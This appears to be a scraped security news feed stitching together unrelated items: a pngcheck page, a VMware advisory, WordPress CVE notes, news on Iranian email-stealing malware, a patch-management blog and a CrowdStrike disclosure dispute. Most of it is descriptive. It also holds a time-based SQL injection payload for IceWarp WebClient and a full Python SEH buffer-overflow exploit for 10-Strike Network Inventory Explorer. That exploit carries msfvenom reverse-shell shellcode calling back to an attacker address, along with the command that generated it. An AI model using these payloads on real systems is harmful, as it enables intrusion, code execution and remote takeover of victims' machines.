A global buffer overflow was discovered in pngcheck function in pngcheck-2.4.0(5 patches applied) via a crafted png file.

**pngcheck** verifies the integrity of PNG, JNG and MNG files (by checking the internal 32-bit CRCs, a.k.a. checksums, and decompressing the image data); it can optionally dump almost all of the chunk-level information in the image in human-readable form. For example, it can be used to print the basic statistics about an image (dimensions, bit depth, etc.); to list the color and transparency info in its palette (assuming it has one); or to extract the embedded text annotations. This is a command-line program with batch capabilities.

Here's some sample output (screen shots, eh?):

    % **pngcheck -cvt ArcTriomphe-iCCP-red-blue-swap.png**
    File: **ArcTriomphe-iCCP-red-blue-swap.png** (5171 bytes)
      chunk IHDR at offset 0x0000c, length 13
        64 x 64 image, 8-bit colormap, non-interlaced
      chunk iCCP at offset 0x00025, length 461
        profile name = Swapped red & blue channel
        compression method = 0 (deflate), compressed profile = 433 bytes
      chunk PLTE at offset 0x001fe, length 759: 253 palette entries
      chunk IDAT at offset 0x00501, length 3616
        zlib: deflated, 32K window, default compression
      chunk tEXt at offset 0x0132d, length 68, keyword: Title
        PNG color-correction test image, swapped red and blue channels
      chunk tEXt at offset 0x0137d, length 143, keyword: Copyright
        Copyright 2005 Greg Roelofs. Licensed under Creative Commons
        AttributionNonCommercial, http://creativecommons.org/licenses/by-nc/2.5/
      chunk tIME at offset 0x01418, length 7: 16 Aug 2005 07:07:07 GMT
      chunk IEND at offset 0x0142b, length 0
    **No errors detected** in ArcTriomphe-iCCP-red-blue-swap.png (8 chunks, -26.2% compression).

    % **pngcheck -c \*.png**
    **OK**: 000000.png (48x48, 1-bit grayscale, non-interlaced, 71.2%).
    **OK**: 000033.png (48x48, 1-bit colormap, non-interlaced, 66.0%).
    **OK**: 000066.png (48x48, 1-bit colormap, non-interlaced, 66.0%).
    **OK**: 000099.png (48x48, 1-bit colormap, non-interlaced, 66.0%).
     \[...\]
    **OK**: ffff66.png (48x48, 1-bit colormap, non-interlaced, 66.0%).
    **OK**: ffff99.png (48x48, 1-bit colormap, non-interlaced, 66.0%).
    **OK**: ffffcc.png (48x48, 1-bit colormap, non-interlaced, 66.0%).
    **OK**: ffffff.png (48x48, 1-bit grayscale, non-interlaced, 70.1%).
    ataylor-bad-text-length.png  illegal (unless recently approved) unknown, public chunk xORk
    **ERROR**: ataylor-bad-text-length.png
    google-island-96x69.png  zlib: inflate error = -3 (data error)
    **ERROR**: google-island-96x69.png

    Errors were detected in 2 of the 218 files tested.
    No errors were detected in 216 of the 218 files tested.

**Vulnerability Warning**

  
pngcheck versions 3.0.2 and earlier have a divide-by-zero bug when zlib-decoding interlaced PNGs with extra data beyond what is required for the declared image dimensions. This bug is fixed in version **3.0.3**, released on 25 April 2021. Again, while all _known_ vulnerabilities are fixed in this version, the code is quite crufty, so it would be safest to assume there are still some problems hidden in there. As always, use at your own risk.

The current release supports all PNG, MNG and JNG chunks, including the newer **sTER** (stereo layout) and **eXIf** (EXIF metadata) chunks. It correctly reports errors in all but two of the images in Chris Nokleberg's brokensuite-20061204. Also included (since version 2.1.0) are two helper utilities:

*   **pngsplit** - break a PNG, MNG or JNG image into constituent chunks (numbered for easy reassembly)
*   **png-fix-IDAT-windowsize** - fix minor zlib-header breakage caused by libpng 1.2.6

The extra utilities are licensed under the GNU General Public License (GPL); pngcheck itself remains under its original, MIT/X11-style license.

**Security and Crash Bugs in Older Versions**

**Vulnerability Warning**

  
pngcheck versions 3.0.1 and earlier have a buffer-overrun bug related to the MNG LOOP chunk (which gets noticed even in PNG files if the \-s option is used). This bug is fixed in version **3.0.2**, released on 31 January 2021. Again, while all _known_ vulnerabilities are fixed in this version, the code is quite crufty, so it would be safest to assume there are still some problems hidden in there. As always, use at your own risk.

**Vulnerability Warning**

  
pngcheck versions 3.0.0 and earlier have a pair of buffer-overrun bugs related to the sPLT and PPLT chunks (the latter is a MNG-only chunk, but it gets noticed even in PNG files if the \-s option is used). Both bugs are fixed in version **3.0.1**, released on 24 January 2021. Again, while all _known_ vulnerabilities are fixed in this version, the code is quite crufty, so it would be safest to assume there are still some problems hidden in there. As always, use at your own risk.

**Vulnerability Warning**

  
pngcheck versions 2.4.0 and earlier have a number of buffer-overrun bugs, most (but not all) of which are related to the -f option ("force continued parsing after major errors"). As such, the option has been removed altogether in version **3.0.0** (which is the reason for the major-version bump), released on 12 December 2020. All _known_ vulnerabilities are fixed in this version, but the code is pretty crufty, so it would be safest to assume there are still some problems hidden in there. As always, use at your own risk.

*   PNG home page
*   MNG home page

 _Last updated 22 August 2021._

Copyright © 2000-2021 Greg Roelofs.

CVE-2020-35511: pngcheck Home Page

VMware Tools (12.0.0, 11.x.y and 10.x.y) contains a local privilege escalation vulnerability. A malicious actor with local non-administrative access to the Guest OS can escalate privileges as a root user in the virtual machine.

Advisory ID: VMSA-2022-0024

CVSSv3 Range: 7.0

Issue Date: 2022-08-23

Updated On: 2022-08-23 (Initial Advisory)

CVE(s): CVE-2022-31676

Synopsis: VMware Tools update addresses a local privilege escalation vulnerability (CVE-2022-31676)

Share this page on social media

Sign up for Security Advisories

****1\. Impacted Products****

*   VMware Tools

****2\. Introduction****

VMware Tools was impacted by a local privilege escalation vulnerability. Updates are available to remediate this vulnerability in affected VMware products.

****3\. Local privilege escalation vulnerability (CVE-2022-31676)****

VMware Tools contains a local privilege escalation vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.0.

A malicious actor with local non-administrative access to the Guest OS can escalate privileges as a root user in the virtual machine.

To remediate CVE-2022-31676 apply the patches listed in the 'Fixed Version' column of the 'Response Matrix' found below.

VMware Tools 10.3.25 only applies to the older Linux releases.

Product

Version

Running On

CVE Identifier

CVSSv3

Severity

Fixed Version

Workarounds

Additional Documentation

VMware Tools

12.x.y, 11.x.y

Windows

CVE-2022-31676

7.0

important

12.1.0

None

None

VMware Tools

12.x.y, 11.x.y

Linux

CVE-2022-31676

7.0

important

12.1.0

None

None

VMware Tools

10.x.y

Linux

CVE-2022-31676

7.0

important

10.3.25

None

None

****4\. References****

****5\. Change Log****

**2022-08-23 VMSA-2022-0024  
**Initial security advisory.

****6\. Contact****

CVE-2022-31676: VMSA-2022-0024

IceWarp WebClient DC2 - Update 2 Build 9 (13.0.2.9) was discovered to contain a SQL injection vulnerability via the search parameter at /webmail/server/webmail.php.

\[+\] Title: IceWarp WebClient \[+\] Author: veyselxan \[+\] Vendor Homepage:https://www.icewarp.com/ \[+\] Tested on: Windows 10 \[+\] Versions: 13.0.2.9 \[+\] Fix version: DC2 - Update 2 Build 10 (13.0.2.10) \[+\] Vulnerability Type: SQL injection \[+\] Vulnerable Parameter: "search" \[+\] Vulnerable File: webmail/server/webmail.php \[+\] Cve:CVE-2022-35115 \[+\] Video POC: https://youtu.be/E04ZuqISASQ \[+\] Exploit: INJECTION\_CODE\_POC') AND (SELECT 9056 FROM (SELECT(SLEEP(5)))Ouc0) AND ('bvsb'=bvsb \[+\] Payload: 240 IceWarp WebClient DC2 - Update 2 Build 9 (13.0.2.9) was discovered to contain a SQL injection vulnerability via the search parameter at /webmail/server/webmail.php.

CVE-2022-35115

Unauthenticated plugin settings change vulnerability in 59sec THE Leads Management System: 59sec LITE plugin <= 3.4.1 at WordPress.

*   Details
*   Reviews
*   Support
*   Development

This plugin has been closed as of August 12, 2022 and is not available for download. This closure is temporary, pending a full review.

Totally love it. When are you launching Windows Mobile app? Some of my sales persons are using Nokia Lumia phones and we really need them. By the way, we upgraded at 59sec PRO and we are very happy as well.

Best feature on wordpres for a guy that wants to make some sales. Indeed, is ideal for companies with several sales agents, but even for small sites, like mine, is GREAT. 🙂 You should promote yourself more!

I used 59sec lite for an ecommerce site I did for a client of mine. Even if it helps less when it comes to ecommerce for leads, it's very usefull to answer questions that leads to purchase. I like it.

Read all 6 reviews

“THE Leads Management System: 59sec LITE” is open source software. The following people have contributed to this plugin.

Contributors

*    59sec

CVE-2022-35242: THE Leads Management System: 59sec LITE

Multiple Authenticated (contributor+) Persistent Cross-Site Scripting (XSS) vulnerabilities in W3 Eden Download Manager plugin <= 3.2.48 at WordPress.

CVE-2022-34658: Download Manager

The Iranian government-backed actor known as Charming Kitten has added a new tool to its malware arsenal that allows it to retrieve user data from Gmail, Yahoo!, and Microsoft Outlook accounts.
Dubbed HYPERSCRAPE by Google Threat Analysis Group (TAG), the actively in-development malicious software is said to have been used against less than two dozen accounts in Iran, with the oldest known

The Iranian government-backed actor known as Charming Kitten has added a new tool to its malware arsenal that allows it to retrieve user data from Gmail, Yahoo!, and Microsoft Outlook accounts.

Dubbed **HYPERSCRAPE** by Google Threat Analysis Group (TAG), the actively in-development malicious software is said to have been used against less than two dozen accounts in Iran, with the oldest known sample dating back to 2020. The tool was first discovered in December 2021.

Charming Kitten, a prolific advanced persistent threat (APT), is believed to be associated with Iran's Islamic Revolutionary Guard Corps (IRGC) and has a history of conducting espionage aligned with the interests of the government.

Tracked as APT35, Cobalt Illusion, ITG18, Phosphorus, TA453, and Yellow Garuda, elements of the group have also carried out ransomware attacks, suggesting that the threat actor's motives are both espionage and financially driven.

"HYPERSCRAPE requires the victim's account credentials to run using a valid, authenticated user session the attacker has hijacked, or credentials the attacker has already acquired," Google TAG researcher Ajax Bash said.

Written in .NET and designed to run on the attacker's Windows machine, the tool comes with functions to download and exfiltrate the contents of a victim's email inbox, in addition to deleting security emails sent from Google to alert the target of any suspicious logins.

Should a message be originally unread, the tool marks it as unread after opening and downloading the email as a ".eml" file. What's more, earlier versions of HYPERSCRAPE are said to have included an option to request data from Google Takeout, a feature that allows users to export their data to a downloadable archive file.

The findings follow the recent discovery of a C++-based Telegram "grabber" tool by PwC used against domestic targets to obtain access to Telegram messages and contacts from specific accounts.

Previously, the group was spotted deploying a custom Android surveillanceware called LittleLooter, a feature-rich implant capable of gathering sensitive information stored in the compromised devices as well as recording audio, video, and calls.

"Like much of their tooling, HYPERSCRAPE is not notable for its technical sophistication, but rather its effectiveness in accomplishing Charming Kitten's objectives," Bash said. The affected accounts have since been re-secured and the victims notified.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Google Uncovers Tool Used by Iranian Hackers to Steal Data from Email Accounts

10-Strike Network Inventory Explorer versions 9.3 and below are vulnerable to a SEH based buffer overflow which leads to code execution or local privilege escalation. The vulnerable part of the program is the functionality to add computers from a text file.

I. VULNERABILITY  
-------------------------  
10-Strike Network Inventory Explorer Version 9.3 - Privilege Escalation through SEH based Buffer Overflow

II. VENDOR  
-------------------------  
10-Strike Network (https://www.10-strike.com/)

III. DESCRIPTION  
-------------------------

10-Strike Network Inventory Explorer until latest version (9.3) is vulnerable to a SEH based Buffer Overflow which leads to code execution or local privilege escalation. The vulnerable part of the program is the functionality to add computers from a text file.

IV. EXPLOIT  
-------------------------  
# Exploit Title: 10-Strike Network Inventory Explorer Version 9.3 - Privilege Escalation through SEH based Buffer Overflow  
# Date: 16/08/2022  
# Exploit Author: Ricardo Ruiz (@ricardojoserf)  
# Vendor website: https://www.10-strike.com/  
# Product website: https://www.10-strike.com/networkinventoryexplorer/  
# Usage: Create a file with this script and upload it clicking "Computers" and "Add". It should pop a calculator

from struct import pack

# Bad chars are: \x09\x0a\x0d\x3a\x5c  
badchars = (  
b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"  
b"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3b\x3c\x3d\x3e\x3f\x40"  
b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"  
b"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5d\x5e\x5f\x60"  
b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"  
b"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"  
b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"  
b"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"  
b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"  
b"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"  
b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"  
b"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"  
b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"  
b"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"  
#b"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"  
#b"\x01\x02\x03\x04\x05\x06\x07\x08\x0b\x0c\x0e\x0f\x10"  
)

# msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=192.168.49.81 -b "\x00\x09\x0a\x0d\x3a\x5c\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x0b\x0c\x0e\x0f\x10" -v payload --smallest -f py  
payload =  b""  
payload += b"\x89\xe3\xdb\xd0\xd9\x73\xf4\x5b\x53\x59\x49\x49"  
payload += b"\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43"  
payload += b"\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30"  
payload += b"\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"  
payload += b"\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"  
payload += b"\x69\x6c\x79\x78\x4c\x42\x43\x30\x53\x30\x33\x30"  
payload += b"\x51\x70\x6e\x69\x6b\x55\x30\x31\x69\x50\x61\x74"  
payload += b"\x6c\x4b\x36\x30\x56\x50\x4c\x4b\x50\x52\x76\x6c"  
payload += b"\x6e\x6b\x63\x62\x57\x64\x4c\x4b\x32\x52\x45\x78"  
payload += b"\x34\x4f\x58\x37\x32\x6a\x54\x66\x56\x51\x49\x6f"  
payload += b"\x6e\x4c\x45\x6c\x43\x51\x43\x4c\x74\x42\x34\x6c"  
payload += b"\x51\x30\x69\x51\x5a\x6f\x76\x6d\x35\x51\x68\x47"  
payload += b"\x4d\x32\x4c\x32\x32\x72\x33\x67\x4e\x6b\x62\x72"  
payload += b"\x64\x50\x6e\x6b\x71\x5a\x65\x6c\x6e\x6b\x70\x4c"  
payload += b"\x54\x51\x43\x48\x78\x63\x53\x78\x36\x61\x4a\x71"  
payload += b"\x46\x31\x4e\x6b\x30\x59\x35\x70\x65\x51\x49\x43"  
payload += b"\x4c\x4b\x50\x49\x34\x58\x59\x73\x47\x4a\x32\x69"  
payload += b"\x6c\x4b\x66\x54\x6c\x4b\x76\x61\x69\x46\x75\x61"  
payload += b"\x69\x6f\x6c\x6c\x69\x51\x5a\x6f\x64\x4d\x66\x61"  
payload += b"\x6f\x37\x66\x58\x39\x70\x63\x45\x49\x66\x64\x43"  
payload += b"\x73\x4d\x49\x68\x77\x4b\x51\x6d\x66\x44\x43\x45"  
payload += b"\x5a\x44\x51\x48\x6c\x4b\x56\x38\x37\x54\x76\x61"  
payload += b"\x7a\x73\x35\x36\x4e\x6b\x76\x6c\x30\x4b\x6c\x4b"  
payload += b"\x46\x38\x47\x6c\x56\x61\x58\x53\x6e\x6b\x74\x44"  
payload += b"\x6e\x6b\x45\x51\x38\x50\x6e\x69\x52\x64\x51\x34"  
payload += b"\x37\x54\x33\x6b\x31\x4b\x61\x71\x33\x69\x51\x4a"  
payload += b"\x62\x71\x49\x6f\x6b\x50\x31\x4f\x73\x6f\x33\x6a"  
payload += b"\x4c\x4b\x62\x32\x5a\x4b\x4e\x6d\x31\x4d\x63\x58"  
payload += b"\x55\x63\x55\x62\x43\x30\x73\x30\x73\x58\x33\x47"  
payload += b"\x44\x33\x76\x52\x61\x4f\x46\x34\x51\x78\x42\x6c"  
payload += b"\x34\x37\x54\x66\x57\x77\x79\x6f\x79\x45\x6e\x58"  
payload += b"\x6c\x50\x47\x71\x75\x50\x43\x30\x77\x59\x38\x44"  
payload += b"\x30\x54\x36\x30\x45\x38\x67\x59\x6b\x30\x70\x6b"  
payload += b"\x43\x30\x79\x6f\x59\x45\x52\x70\x50\x50\x30\x50"  
payload += b"\x42\x70\x33\x70\x56\x30\x61\x50\x72\x70\x53\x58"  
payload += b"\x4a\x4a\x76\x6f\x79\x4f\x79\x70\x59\x6f\x79\x45"  
payload += b"\x6d\x47\x32\x4a\x47\x75\x63\x58\x69\x50\x69\x38"  
payload += b"\x34\x71\x33\x61\x65\x38\x74\x42\x45\x50\x75\x51"  
payload += b"\x6f\x4b\x4e\x69\x38\x66\x31\x7a\x34\x50\x46\x36"  
payload += b"\x31\x47\x32\x48\x6d\x49\x49\x35\x51\x64\x45\x31"  
payload += b"\x79\x6f\x69\x45\x4d\x55\x4b\x70\x53\x44\x56\x6c"  
payload += b"\x49\x6f\x72\x6e\x46\x68\x64\x35\x78\x6c\x71\x78"  
payload += b"\x38\x70\x6d\x65\x79\x32\x42\x76\x49\x6f\x68\x55"  
payload += b"\x63\x58\x52\x43\x30\x6d\x75\x34\x33\x30\x6c\x49"  
payload += b"\x6a\x43\x63\x67\x52\x77\x33\x67\x50\x31\x79\x66"  
payload += b"\x30\x6a\x62\x32\x53\x69\x76\x36\x59\x72\x4b\x4d"  
payload += b"\x65\x36\x6b\x77\x43\x74\x46\x44\x37\x4c\x47\x71"  
payload += b"\x56\x61\x4e\x6d\x73\x74\x77\x54\x66\x70\x4a\x66"  
payload += b"\x33\x30\x43\x74\x30\x54\x70\x50\x51\x46\x76\x36"  
payload += b"\x36\x36\x51\x56\x30\x56\x30\x4e\x72\x76\x62\x76"  
payload += b"\x56\x33\x56\x36\x62\x48\x63\x49\x6a\x6c\x75\x6f"  
payload += b"\x4f\x76\x59\x6f\x49\x45\x4d\x59\x6d\x30\x52\x6e"  
payload += b"\x70\x56\x61\x56\x59\x6f\x44\x70\x35\x38\x53\x38"  
payload += b"\x6c\x47\x55\x4d\x61\x70\x6b\x4f\x79\x45\x4d\x6b"  
payload += b"\x7a\x50\x48\x35\x4d\x72\x43\x66\x50\x68\x6c\x66"  
payload += b"\x7a\x35\x4d\x6d\x6f\x6d\x59\x6f\x4b\x65\x65\x6c"  
payload += b"\x46\x66\x63\x4c\x55\x5a\x6b\x30\x6b\x4b\x6d\x30"  
payload += b"\x51\x65\x75\x55\x4f\x4b\x72\x67\x72\x33\x52\x52"  
payload += b"\x72\x4f\x63\x5a\x35\x50\x61\x43\x79\x6f\x39\x45"  
payload += b"\x41\x41"

#buffer = "A"*100000  
buffer =  b"A"*207  
buffer += b"\x90\x90\xeb\x04" # bp 0x61e4dab1; g  
buffer += b"\xb1\xda\xe4\x61"  
buffer += b"\x90"*2  
buffer += payload

with open("test.txt", 'wb') as out:  
    out.write(buffer)

10-Strike Network Inventory Explorer 9.3 Buffer Overflow

Categories: Business
With a patch management platform, MSPs can greatly simplify the patching process for their clients—and the benefits don’t end there. In this post, we break down six reasons MSPs need a patch management platform.



(Read more...)




The post 6 reasons MSPs need a patch management platform appeared first on Malwarebytes Labs.

We’ve all heard the stories: Organizations getting breached like there's no tomorrow thanks to threat actors exploiting unpatched vulnerabilities. Likewise, we’ve also all heard the familiar refrain: Patch regularly! But for many businesses—including the Managed Service Providers (MSPs) that serve them—“patching regularly” is easier said than done.

From prioritizing what to patch to getting a common view of all the vulnerabilities across their customer environment, patching is no cakewalk for MSPs. To boot, many MSPs already face constrained staff resources and a team that is often overloaded with alert triage. 

With a patch management platform, however, MSPs can greatly simplify the patching process for their clients—and the benefits don’t end there.

In this post, we break down six reasons MSPs need a patch management platform.

**Table of Contents**

1.  **Fills a dire need for MSP customers**
2.  **Generates new MSP revenue streams**
3.  **Gives visibility across diverse customer assets**
4.  **Helps MSPs become a more holistic cybersecurity provider**
5.  **Streamlines threat assessment and mitigation**
6.  **Allows you to quickly stay on top of evolving security risks**

**Simplify patch deployment for your customers**

**1\. Fills a dire need for MSP customers **

According to Ponemon Institute, almost 60% of low-security maturity organizations (i.e most MSP customers) suffered a data breach because “a patch was available for a known vulnerability but not applied”. 

So, why aren’t SMBs applying patches? Simply put, because their vulnerability and patch management (VPM) activities are either only partially deployed (40%) or not even “planned or deployed at all” (24%), according to the same Ponemon study.

This is where MSPs can step in. By taking the reins of their customers’ VPM activities with a VPM platform, MSPs are filling a dire need for organizations who lack the budget and staff to do patch management themselves.

**2\. Generates new MSP revenue streams**

According to Market Data Forecast: “The global patch management market size is forecasted to grow to USD 1.084 billion by 2027 from USD 652 million in 2022, growing at a CAGR of 10.7% between 2022 to 2027.”

Needless to say, as the threat of unpatched vulnerabilities continues to increase, and as organizations with limited budgets and IT staff continue to struggle with patching, MSPs are in great shape to capitalize on the growing market size of patch management platforms.

“Adding a VPM platform to your MSP's existing menu of security services will allow you to generate new/additional Monthly Recurring Revenue (MRR),” says Josh Pederson, MSP expert and Senior Director of Global Product Marketing at Malwarebytes. 

What’s also important to highlight here is not just how MSPs can grow revenue directly from VPM, but indirectly as well. Nadia Karatoreos, Senior MSP Growth Strategist at Malwarebytes, explains: “Having a simplified and automated patch management process allows the MSP to focus their attention on other revenue generating activities.”

Check out our MSP’s Guide to selling security!

**3\. Gives visibility across diverse customer assets**

Most MSPs (69%) have up to 100 different clients, according to Datto's Global State of the MSP Report. Dozens of different clients, each using different flavors of OSes, servers, and applications—and each one of those with their own unique vulnerabilities. 

Without a VPM platform, patching all of these assets would be a nightmare for MSPs.

“The more OS and application combinations at a customer site, the more individual patches need to be maintained,” says Pederson. “Most customers do not have a homogenous set of endpoints (only Mac, etc), so MSPs are forced to stay on top of multiple versions of the same software (Slack for OSX and Slack for Windows–double the challenge).”

A patch management platform can bring all the vulnerabilities and patch updates across your network under one view. For example, in the below screenshot of Malwarebytes OneView VPM, you can see detailed information on available software and OS patches across sites and endpoints.

**4\. Helps MSPs become a more holistic cybersecurity provider**

MSPs are heroes to the companies they serve. Providing IT services and support is not an easy job, and to do it well, requires a technology stack that is scalable, reliable, and above all, comprehensive.

SMBs who outsource their cybersecurity are looking for providers who cover all their bases–in fact, 91% of SMBs would consider switching IT service providers if they found a new one that offered the “right” cybersecurity services. And while the “right” services will vary from SMB to SMB, some form of endpoint protection, EDR, and VPM services are high-up on the list for every security-minded business.

“Enhancing their ability to prevent infections is an urgent need of MSPs,” says Pederson. “Patch management is a preventative measure that helps the MSP reduce customer risk of malware infection. Many AV and EDR options do not provide this as a layer of protection, so clients are looking for it.”

In addition, adding VPM services to their portfolio not only helps MSPs better serve their clients, but it also helps them stay competitive in a notoriously competitive MSP landscape.

“MSPs can outcompete other MSPs when they provide a more comprehensive security service. A patch management platform provides that to them,” says Pederson. 

**5\. Streamlines threat assessment and mitigation**

“Threat assessment involves identifying threats, determining the seriousness of each threat, and prioritizing how to manage threat actors,” says Nosa Obosohan, Senior Director, Cloud Product Platform at Malwarebytes.

The most common way of measuring security vulnerabilities is with the Common Vulnerability Scoring System (CVSS), which provides IT professionals a standardized process for assessing vulnerabilities. Without a VPM platform, you can expect to experience a higher level of effort trying to assign priority to your patching schedule manually.

“IT teams’ patch management challenges start with incomplete asset inventory, not being able to prioritize vulnerabilities, and determining how to patch up those systems in a timely manner. A VPM platform can address all these concerns,” says Obasohan.

**6\. Allows you to quickly stay on top of evolving security risks**

By now, we should understand that one of the best pieces of insurance against infection is not just patching, but timely patching. Automated patching–a feature of most VPM platforms–vastly improves your ability to patch in a timely manner.

“Many data breaches and ransomware attacks are the result of known vulnerabilities that have not been addressed,” says Rumna Mishra, VP of Product Management at Malwarebytes. “VPM helps organizations minimize their attack surface, identify & patch vulnerabilities in a timely manner.”

Organizations who don’t automate their patching have a much more difficult time patching things quickly–80% of organizations that use automation say they have the ability to respond to vulnerabilities in a shorter time frame. A patch management platform that automates patching gives MSPs the tool they need to quickly prevent security risks for their customers.

**Simplify patch deployment for your customers **

The benefits of a patch management platform for MSPs are manyfold. 

On the business side, a VPM platform not only helps MSPs generate revenue and stay competitive, but it also fills a dire need for MSP customers. On the practical side, a VPM platform gives MSPs easy visibility into all of their customers' assets, and, through automation, streamlines CVSS scoring and timely patching.

Want to continue learning how to maximize the profitability of your MSP business? Give a listen to our newly launched MSP podcast, “MSP Smartbytes”!

With Malwarebytes Vulnerability and Patch Management for OneView, MSPs can easily search for vulnerabilities across their customer ecosystem and patch them quickly. See the demo below!

6 reasons MSPs need a patch management platform

The vulnerability might not be noteworthy, but the reporting process may be A security firm has criticized CrowdStrike for operating a “ridiculous” bug bounty disclosure program following a sensor fla

The vulnerability might not be noteworthy, but the reporting process may be

A security firm has criticized CrowdStrike for operating a “ridiculous” bug bounty disclosure program following a sensor flaw report.

In April, Pascal Zenker, a partner of Swiss security analyst service Modzero AG, discovered a vulnerability in CrowdStrike Falcon Sensor, agent software used to transmit data to the Falcon endpoint security platform.

The vulnerability, tracked as CVE-2022-2841, allowed attackers to exploit and bypass the one-time generated token check used to uninstall the sensors on Windows devices, thereby cutting security event data streams and potentially leaving the machine vulnerable to further compromise by malware.

The team created an automated proof-of-concept (PoC) tool to corrupt the sensor and ignore the token check in Falcon versions 6.31.14505.0 and 6.42.15610.

However, the attacker already needed administrator privileges to achieve this security bypass, relegating the potentially high-risk vulnerability to a low-severity issue.

Modzero says the bug wasn’t “worth a tweet” as the “overall risk of the vulnerability is very limited,” however, the alleged response of CrowdStrike was worth commenting on.

“We’d like to shed some light on a ridiculous vulnerability disclosure process with CrowdStrike,” the company tweeted.

**Third-party program**

According to a security advisory published Monday (August 22), Modzero expected a clean-cut vulnerability disclosure process from the Nasdaq-listed IT firm. However, Modzero says the “communication and disclosure with CrowdStrike was tedious and turned unprofessional in the end”.

CrowdStrike runs a bug bounty program through HackerOne. The bone of contention appeared that CrowdStrike wanted Modzero to submit the vulnerability through the program. Still, the company did not want to agree to the program’s terms, which were said to include signing a mutual non-disclosure agreement.

Modzero said it requested a direct security contact outside of HackerOne, and after months of emails, the company submitted a draft security advisory in late June, together with a PoC.

Read more of the latest bug bounty news

CrowdStrike said bug replication had not been possible on more recent software versions. Modzero requested a trial version of the latest software, which was allegedly denied.

“As the issue was not considered valid, we informed CrowdStrike that we would release the advisory to the public,” Modzero commented.

“In response, CrowdStrike tried again to set up a bug bounty disclosure meeting between ‘Modzero’s sr Leadership and CrowdStrike CISO \[...\] to discuss \[the\] next steps related to the bug bounty disclosure’ in contrast to our previously stated disclosure rules.”

Modzero said it then acquired a recent version of the software and verified the vulnerability still existed. However, the exploit code had been flagged as malicious – an alleged change that was easily remedied by tweaking the exploit code.

**Advisory published**

Modzero has since published the security advisory, criticizing the cybersecurity firm for being inflexible outside its “NDA-ridden bug bounty program”.

“\[We concluded\] that CrowdStrike tried to ‘fix’ the issue while being told the issue didn’t exist. Which is pretty disrespectful to us,” Modzero commented.

When approached for comment, CrowdStrike directed us to a statement posted on Reddit on Monday (August 22) that links back to Modzero’s advisory.

The cybersecurity firm says that the main problem is a fail-open condition in the Microsoft Installer (MSI) harness, and the issue has been reported to the relevant parties.

According to the company, controlling it would require moving away from the MSI framework. The vulnerability could only be exploited with specialized software, local admin access, privilege elevation, and an endpoint reboot.

CrowdStrike informed customers in July.

“Detection logic was also added to the sensor to try to detect this technique and similar ones,” CrowdStrike added. “We thank Modzero for their hard work and disclosure of this incident.”

_The Daily Swig_ has reached out to Modzero with additional queries and we will update when we hear back.

**RECOMMENDED** Secure Open Source Rewards program launched to help protect critical upstream software

Security researchers blast ‘ridiculous’ CrowdStrike bug disclosure practices

Engineering manager Scott Tenaglia describes how Meta extended the security red team model to aggressively protect data privacy.

As several countries and US states prepare to enact new data privacy regulations next year, some companies have begun borrowing from an approach familiar to cybersecurity teams: that the best defense is a strong offense. While security red teams made up of friendly hackers who engage in persistent penetration testing are common, some organizations are now applying that same concept to data privacy.

Meta Platforms, the parent company of Facebook, Instagram, and WhatsApp, is among those that formed a privacy red team. Scott Tenaglia, the engineering manager for Meta's privacy red team, described how and why Meta created it during a session at the Black Hat USA 2022 conference in Las Vegas.

In the session "Better Privacy Through Offense: How to Build a Privacy Red Team," Tenaglia emphasized that his presentation was just about the lessons learned from forming a privacy red team. But Meta, for years under scrutiny about how it handles user data, now emphasizes data protection. Earlier this year the company revamped its privacy policy, which it recently just referred to as a Data Policy.

"As privacy and data protection regulations have improved around the world in recent years, we've explored ideas in people-centered privacy design and have worked to make our data practices more transparent," said Meta's chief privacy officer Michel Protti in a recent blog post.

Companies are beginning to create privacy red teams modeled after security red teams, says Orson Lucas, a principal adviser for KPMG's cybersecurity services.

"We're having some early conversations about that," Lucas tells Dark Reading. "It's starting to come up as a point of conversation as a supplemental service, and it's still fairly early and exploratory, but it's something we very much see as an opportunity."

**How Privacy Red Teams Diverge**

Privacy red teams apply the same mindset as their security counterparts, but instead of trying to breach their own networks, they attempt to steal confidential data. Tenaglia acknowledged some overlap between security and privacy red teams but says there are more differences. For instance, he described the impact of attacking an Internet-connected crock pot.

"The security vulnerability might have been pretty vanilla, but the privacy impact of that vulnerability was super high," Tenaglia said. With a privacy compromise, the attacker can access a victim's location, photos, and other sensitive personal information.

"That's really a privacy impact," he said.

